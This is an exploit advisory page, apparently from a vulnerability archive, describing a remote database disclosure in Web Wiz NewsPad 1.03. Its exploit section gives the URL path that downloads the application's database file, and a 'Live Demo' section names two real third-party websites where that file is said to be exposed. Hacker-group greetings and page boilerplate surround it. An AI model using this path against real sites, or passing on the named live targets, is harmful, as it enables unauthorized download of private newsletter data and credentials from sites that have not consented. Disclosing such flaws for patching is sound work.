Web Wiz NewsPad 1.03 Remote Database Disclosure Vulnerability

2009.12.28
Credit: ViRuSMaN
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

========== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ========== [&#187;] ~ Note : Some sites may change the path of the "database/NewsPad.mdb" cause the vulnerability not work ========== [&#187;] Web Wiz NewsPad Remote Database Disclosure Vulnerability ========== [&#187;] Script: [ Web Wiz NewsPad ] [&#187;] Language: [ ASP ] [&#187;] Site page: [ Web Wiz NewsPad - Free eNewsletter Software Download ] [&#187;] Download: [ http://www.webwizguide.com/webwiznewspad/downloads.asp ] [&#187;] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ] [&#187;] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ] [&#187;] My Home: [ HackTeach.Org , Islam-Attack.Com ] ############## ===[ Exploit ]=== [&#187;] http://[target].com/[path]/database/NewsPad.mdb ===[ Live Demo ]=== [&#187;] http://www.whatreallyworks.co.uk/newspad/database/NewsPad.mdb [&#187;] http://www.adorwelding.com/newspad/database/NewsPad.mdb Author: ViRuSMaN <- ##############


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top